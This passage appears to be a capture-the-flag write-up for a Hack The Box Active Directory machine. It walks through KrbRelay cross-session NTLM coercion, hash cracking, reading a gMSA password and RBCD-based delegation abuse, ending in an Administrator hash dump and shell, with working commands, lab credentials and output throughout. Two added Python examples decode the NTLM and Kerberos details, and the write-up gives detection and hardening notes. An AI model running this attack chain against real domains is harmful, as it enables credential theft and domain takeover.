2390 188 55980 74420 656 0 lsass
492 36 52016 64604 2836 0 Microsoft.ActiveDirectory.WebServices
254 13 2912 10840 4152 0 msdtc
646 92 305660 323116 2504 0 MsMpEng
110 7 1276 6892 1692 1 PickerHost
158 10 1612 8700 6676 1 PickerHost
0 14 320 21272 88 0 Registry
235 12 2704 17160 2588 1 RuntimeBroker
293 15 5656 17056 6192 1 RuntimeBroker
231 12 2320 12932 6572 1 RuntimeBroker
672 32 19596 72168 5660 1 SearchUI
276 12 2836 12528 2172 0 SecurityHealthService
628 14 5668 13520 636 0 services
783 30 16972 60172 2524 1 ShellExperienceHost
454 17 5080 25200 5544 1 sihost
53 3 528 1228 288 0 smss
329 15 5312 13996 332 0 svchost
209 12 1672 7540 488 0 svchost
158 9 1864 7000 508 0 svchost
137 17 3440 7812 768 0 svchost
89 5 904 4012 848 0 svchost
215 12 1972 10132 864 0 svchost
939 21 6980 23168 868 0 svchost
918 20 5320 13128 916 0 svchost
257 10 2004 7952 956 0 svchost

A Session ID is the unique identifier Windows assigns to each user session; every user gets a session ID at logon, and Windows keeps each logged-on user's session and processes isolated from the others. Session 0 holds the processes associated with system services, since services run in session 0, while interactive user processes live in other sessions.

qwinsta is the command that displays information about sessions on a session host, but it fails here. I came across a Security Stack Exchange post that does not explain why, but shows that RunasCs.exe can make it work:

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> .\RunasCs.exe oorend '1GR8t@$$4u' -l 9 "qwinsta"

SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console tbrady 1 Active

It shows that the user tbrady is logged in.

Using RunasCs together with KrbRelay, a connection from tbrady can be forced, which yields a hash. For this, -ntlm selects NTLM authentication, -session gives the session number, and a CLSID for a valid RPC service with the right permissions is chosen from the defaults listed in the README:

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> .\RunasCs.exe x x -l 9 "C:\Users\winrm_svc\Documents\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm"

[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\winrm_svc\Documents\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAqpryRm+AzL/k6uK/3ZCn9AogAAFAP///S8mcCLJPf9yIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b218e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c299e21853ef0e432bfe50000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e006800740062000700080041dbca167204db010000000000000000000000005c00410070007000490044005c004b00000000000b000000
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:1853ef0e432bfe50:482b499708d53799e6e59dd60a1a7894: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
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
at KrbRelay.Program.Main(String[] args)

tbrady's NetNTLMv2 hash came back; try cracking it with john:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ john tbrady.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
543BOMBOMBUNmanda (tbrady)
1g 0:00:00:04 DONE (2024-09-11 13:44) 0.2398g/s 2923Kp/s 2923Kc/s 2923KC/s 5449977..5435844
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably

It cracks, giving tbrady's password: 543BOMBOMBUNmanda
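
The NTLM1 and NTLM2 lines KrbRelay printed are the raw NEGOTIATE_MESSAGE and CHALLENGE_MESSAGE of the NTLMSSP exchange, and the NetNTLMv2 line john cracked is built from the server challenge in that CHALLENGE_MESSAGE plus the client's response. The following parser is an added example, not part of the original write-up or of KrbRelay: it decodes both messages from the hex above (offsets and flag values per MS-NLMP), lists the AV pairs the DC put in its challenge, and checks that the challenge in the cracked hash line is the one from the NTLM2 message.

```python
import struct
from datetime import datetime, timedelta, timezone

# The two NTLMSSP messages from the KrbRelay output above, and the cracked NetNTLMv2 line
# (its final blob field is omitted here, as it is on the page).
NTLM1_HEX = "4e544c4d535350000100000097b218e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44"
NTLM2_HEX = "4e544c4d53535000020000000e000e003800000015c299e21853ef0e432bfe50000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e006800740062000700080041dbca167204db010000000000000000000000005c00410070007000490044005c004b00000000000b000000"
HASH_LINE = "tbrady::rebound:1853ef0e432bfe50:482b499708d53799e6e59dd60a1a7894:"

NEGOTIATE_FLAGS = {   # MS-NLMP 2.2.2.5, the subset that matters for reading a capture
    0x00000001: "UNICODE", 0x00000002: "OEM", 0x00000004: "REQUEST_TARGET",
    0x00000010: "SIGN", 0x00000020: "SEAL", 0x00000080: "LM_KEY", 0x00000200: "NTLM",
    0x00001000: "OEM_DOMAIN_SUPPLIED", 0x00002000: "OEM_WORKSTATION_SUPPLIED",
    0x00008000: "ALWAYS_SIGN", 0x00010000: "TARGET_TYPE_DOMAIN",
    0x00020000: "TARGET_TYPE_SERVER", 0x00080000: "EXTENDED_SESSIONSECURITY",
    0x00100000: "IDENTIFY", 0x00800000: "TARGET_INFO", 0x02000000: "VERSION",
    0x20000000: "128", 0x40000000: "KEY_EXCH", 0x80000000: "56",
}
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            9: "TargetName", 10: "ChannelBindings"}


def _from_hex(hexstr):
    hexstr = hexstr.strip()
    return bytes.fromhex(hexstr[: len(hexstr) // 2 * 2])   # tolerate a stray trailing nibble


def _field(buf, off):
    """Decode a (Len, MaxLen, BufferOffset) descriptor and return the bytes it points at."""
    length, _max_len, start = struct.unpack_from("<HHI", buf, off)
    return buf[start:start + length]


def _version(buf, off):
    major, minor, build = struct.unpack_from("<BBH", buf, off)
    return f"{major}.{minor}.{build}"


def flag_names(flags):
    return [name for bit, name in sorted(NEGOTIATE_FLAGS.items()) if flags & bit]


def filetime_to_datetime(ft):
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_negotiate(hexstr):
    buf = _from_hex(hexstr)
    if buf[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", buf, 8)[0] != 1:
        raise ValueError("not an NTLM NEGOTIATE_MESSAGE")
    flags = struct.unpack_from("<I", buf, 12)[0]
    return {
        "flags": flags, "flag_names": flag_names(flags),
        "domain": _field(buf, 16).decode("ascii"),        # OEM strings in NEGOTIATE
        "workstation": _field(buf, 24).decode("ascii"),
        "version": _version(buf, 32),
    }


def parse_challenge(hexstr):
    buf = _from_hex(hexstr)
    if buf[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", buf, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    flags = struct.unpack_from("<I", buf, 20)[0]
    av_pairs, info, pos = {}, _field(buf, 40), 0
    while True:                                            # walk the AV_PAIR list
        av_id, av_len = struct.unpack_from("<HH", info, pos)
        pos += 4
        if av_id == 0:                                     # MsvAvEOL
            break
        raw, pos = info[pos:pos + av_len], pos + av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        if av_id == 7:
            av_pairs[name] = filetime_to_datetime(struct.unpack("<Q", raw)[0])
        elif av_id in (6, 8, 10):
            av_pairs[name] = raw.hex()
        else:
            av_pairs[name] = raw.decode("utf-16-le")
    return {
        "flags": flags, "flag_names": flag_names(flags),
        "target_name": _field(buf, 12).decode("utf-16-le"),
        "server_challenge": buf[24:32].hex(),
        "version": _version(buf, 48),
        "av_pairs": av_pairs,
    }


def challenge_matches_hash(hash_line, challenge):
    """The 4th ':'-separated field of a NetNTLMv2 line is the server challenge answered."""
    return hash_line.split(":")[3].lower() == challenge["server_challenge"]


if __name__ == "__main__":
    print(parse_negotiate(NTLM1_HEX))
    ch = parse_challenge(NTLM2_HEX)
    print(ch)
    print("hash line uses this challenge:", challenge_matches_hash(HASH_LINE, ch))
```

What the decoded challenge shows: the target info names DC01 and dc01.rebound.htb and carries an MsvAvTimestamp with EXTENDED_SESSIONSECURITY negotiated, so this is a plain NTLMv2 exchange from the DC to itself; the hash cracks only because tbrady's password is weak. On the detection side this exchange is a 4624 network logon with authentication package NTLM whose source is the DC itself, which deserves an alert on a domain controller; "Network security: Restrict NTLM" auditing makes such logons visible, and a password that survives rockyou is the fix for the account.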

ACL Abuse

Analysing tbrady in BloodHound shows that this user can read the password of a machine account named delegator$.

Using bloodyAD with tbrady's credentials, read the NTLM hash of delegator$:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ bloodyAD -d rebound.htb -u tbrady -p 543BOMBOMBUNmanda --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:f7f7ea94cd22bd4129ca00bab335ceb9
msDS-ManagedPassword.B64ENCODED: ZhCKwN40T+v50IN1lFCkGOApU8008D+oW99yDAjZIaB1sRThOkiMLh2XW/vtZS0+ZJmP41rOCKmZSsMohCCwqJRLFC7jWFtgiFlt4eOJaTMAQcF1JVbhhXdfYf9tgxXGmeNHcjjybJPKmzpN8pc5HB1Ax8rau9Fj4myZUHTGd/+Gx96XeLGHJQ1wOyTcyRHSleSl8NREUiDNtJ5jhfpYO32TyRmXdDPY1a8ny6JsgZGyZgBeOAXnbXWaOBNl7D6FYSbQ8K0+yNjS120QUbZE/p2DASXBGIlYH0C5kLjEfP5Tu0RIOZop2vm1fU58pHfU3spUboWpbVGfx+2hEj0erQ==

Constrained Delegation Without Protocol Transition

BloodHound shows no lateral-movement path from delegator$, but from the name of the machine account it is not hard to guess that it has something to do with delegation.

findDelegation.py lists the domain's delegation settings; delegator$ has constrained delegation to the domain controller:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ findDelegation.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip dc01.rebound.htb -k
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No

The classic getST approach cannot be used to abuse this constrained delegation,

because the delegation is configured as "Use Kerberos only"; this can be told from whether the ST obtained through S4U2Self is forwardable.

To demonstrate, getST.py fails:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ getST.py -spn http/dc01.rebound.htb -impersonate administrator 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user delegator$ or initial TGT not forwardable

It uses S4U2Self to get delegator$ a ticket for the administrator user, then tries to forward it with S4U2Proxy, which fails (because the ST is not forwardable).

The -self flag tells getST.py to stop after S4U2Self, obtaining the administrator ticket for delegator$. The resulting ticket lacks the forwardable flag:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ getST.py -spn http/dc01.rebound.htb -impersonate administrator 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -self
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] When doing S4U2self only, argument -spn is ignored
[*] Requesting S4U2self
[*] Saving ticket in administrator@delegator$@REBOUND.HTB.ccache

The Flags field has no forwardable entry, showing that this ST is not forwardable:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ describeTicket.py administrator@delegator\$@REBOUND.HTB.ccache

Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : b133b264334cd7f13231a428b4f68ec8
[*] User Name : administrator
[*] User Realm : rebound.htb
[*] Service Name : delegator$
[*] Service Realm : REBOUND.HTB
[*] Start Time : 11/09/2024 14:04:26 PM
[*] End Time : 12/09/2024 00:04:26 AM
[*] RenewTill : 12/09/2024 14:02:13 PM
[*] Flags : (0xa10000) renewable, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : sTOyZDNM1/EyMaQotPaOyA==
[*] Kerberoast hash : $krb5tgs$18$USER$REBOUND.HTB$*delegator$*$72b47c0ffdda4f1189e3a591$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
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : delegator$
[*] Service Realm : REBOUND.HTB
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

The delegations-constrained article describes how constrained delegation without protocol transition can be exploited through RBCD (resource-based constrained delegation).

My understanding: ldap_monitor is a service account. Setting the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the delegator$ machine account to ldap_monitor's SID lets ldap_monitor impersonate DC01$ and obtain a forwardable ST from DC01$ to delegator$. With that ticket in hand, delegator$ can use it in an S4U2Proxy request on behalf of the impersonated user (DC01$), and so obtain a service ticket, as DC01$, for the service delegator$ is allowed to delegate to, which abuses the delegation.

The script:

impacket-getTGT rebound.htb/delegator\$  -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 

export KRB5CCNAME=delegator\$.ccache

rbcd.py 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps

findDelegation.py 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :f7f7ea94cd22bd4129ca00bab335ceb9

getST.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate DC01$

getST.py rebound.htb/delegator\$ -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -spn http/dc01.rebound.htb -additional-ticket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache -impersonate DC01$

The output:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ bash acl.sh
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Saving ticket in delegator$.ccache
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Getting machine hostname
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
------------ ----------------------------------- -------------------------- --------------------- ----------
ldap_monitor Person Resource-Based Constrained delegator$ No
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No



Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Impersonating DC01$
[*] Requesting S4U2self
[-] Kerberos SessionError: KRB_AP_ERR_BADMATCH(Ticket and authenticator don't match)
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Impersonating DC01$
[*] Using additional ticket DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
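
The KDC_ERR_BADOPTION from getST.py, the 0xa10000 flags field in the describeTicket.py output and the two-hop RBCD workaround in acl.sh all come down to one rule: a classic S4U2Proxy request needs a forwardable evidence ticket, and a Kerberos-only constrained service never gets one from S4U2Self. The following model is an added example, not part of the original write-up or of Impacket: it decodes RFC 4120 ticket flags and the relevant userAccountControl bits, classifies an account's delegation mode, applies the (simplified) KDC rule, and replays both the failing run and the RBCD chain. The userAccountControl values fed to it are assumed ones for illustration.

```python
# RFC 4120 TicketFlags bit numbers. describeTicket.py prints the flags as the 32-bit mask
# in which bit 0 is the most significant bit, so 0xa10000 is bits 8, 10 and 15.
TICKET_FLAGS = {
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy", 5: "may_postdate",
    6: "postdated", 7: "invalid", 8: "renewable", 9: "initial", 10: "pre_authent",
    11: "hw_authent", 12: "transited_policy_checked", 13: "ok_as_delegate",
    14: "anonymous", 15: "enc_pa_rep",
}
FORWARDABLE = 1 << (31 - 1)
BASE_FLAGS = 0xA10000          # renewable | pre_authent | enc_pa_rep, as in the output above

# userAccountControl bits that decide how the KDC treats S4U requests for an account
UAC_FLAGS = {
    0x00000002: "ACCOUNTDISABLE", 0x00000200: "NORMAL_ACCOUNT",
    0x00001000: "WORKSTATION_TRUST_ACCOUNT", 0x00002000: "SERVER_TRUST_ACCOUNT",
    0x00080000: "TRUSTED_FOR_DELEGATION", 0x00100000: "NOT_DELEGATED",
    0x00400000: "DONT_REQ_PREAUTH", 0x01000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
TRUSTED_FOR_DELEGATION = 0x00080000
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000


def decode_ticket_flags(mask):
    return [name for bit, name in sorted(TICKET_FLAGS.items()) if mask & (1 << (31 - bit))]


def decode_uac(uac):
    return [name for bit, name in sorted(UAC_FLAGS.items()) if uac & bit]


def delegation_mode(uac, allowed_to_delegate_to):
    """Classify like findDelegation.py, plus the protocol-transition bit it does not print."""
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if allowed_to_delegate_to:                       # msDS-AllowedToDelegateTo is populated
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained, any protocol"
        return "constrained, Kerberos only"
    return "none"


def s4u2self_ticket_flags(service_mode):
    """Flags on the ticket S4U2Self hands back (MS-SFU, simplified): the KDC clears
    FORWARDABLE only for a service constrained without protocol transition."""
    if service_mode == "constrained, Kerberos only":
        return BASE_FLAGS
    return BASE_FLAGS | FORWARDABLE


def s4u2proxy(evidence_ticket_flags, rbcd=False, user_not_delegated=False):
    """(result, flags of the issued ticket). Classic constrained delegation demands a
    FORWARDABLE evidence ticket; RBCD skips that check. Either way the KDC refuses to
    delegate a user marked 'sensitive and cannot be delegated', and a ticket it issues
    through S4U2Proxy is itself forwardable."""
    if user_not_delegated:
        return "refused", None
    if rbcd or evidence_ticket_flags & FORWARDABLE:
        return "allowed", BASE_FLAGS | FORWARDABLE
    return "KDC_ERR_BADOPTION", None


DELEGATOR_MODE = delegation_mode(0x1000, ["http/dc01.rebound.htb"])  # gMSA UAC assumed


def classic_getst_run():
    """getST.py -impersonate administrator as delegator$: S4U2Self, then S4U2Proxy."""
    evidence = s4u2self_ticket_flags(DELEGATOR_MODE)
    return decode_ticket_flags(evidence), s4u2proxy(evidence)[0]


def rbcd_chain():
    """The two S4U2Proxy hops acl.sh performs after the rbcd.py write."""
    # Hop 1: ldap_monitor (no delegation of its own) impersonates DC01$ to delegator$; because
    # delegator$ lists ldap_monitor in msDS-AllowedToActOnBehalfOfOtherIdentity this is RBCD.
    hop1_result, hop1_ticket = s4u2proxy(s4u2self_ticket_flags(delegation_mode(0x200, [])),
                                         rbcd=True)
    # Hop 2: delegator$ presents that (forwardable) ticket as evidence for http/dc01.
    hop2_result, _ = s4u2proxy(hop1_ticket)
    return [("ldap_monitor -> delegator$ (RBCD)", hop1_result),
            ("delegator$ -> http/dc01.rebound.htb", hop2_result)]


if __name__ == "__main__":
    print("delegator$ mode:", DELEGATOR_MODE)
    print("classic getST.py run:", classic_getst_run())
    print("RBCD chain:", rbcd_chain())
```

The model encodes the MS-SFU behaviour that S4U2Self tickets are issued forwardable unless the service has msDS-AllowedToDelegateTo set without TRUSTED_TO_AUTH_FOR_DELEGATION, and that RBCD does not require the forwardable flag. From a hardening view the weak link is that the gMSA could write its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute; a directory-service-changes audit (event 5136) on writes to that attribute would surface the rbcd.py step.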

Finally, the ticket is handed to secretsdump.py to obtain the Administrator hash, and evil-winrm gives an administrator shell:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ export KRB5CCNAME=DC01\$@http_dc01.rebound.htb@REBOUND.HTB.ccache

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ secretsdump.py -k -no-pass dc01.rebound.htb -just-dc-user administrator
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rebound\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc01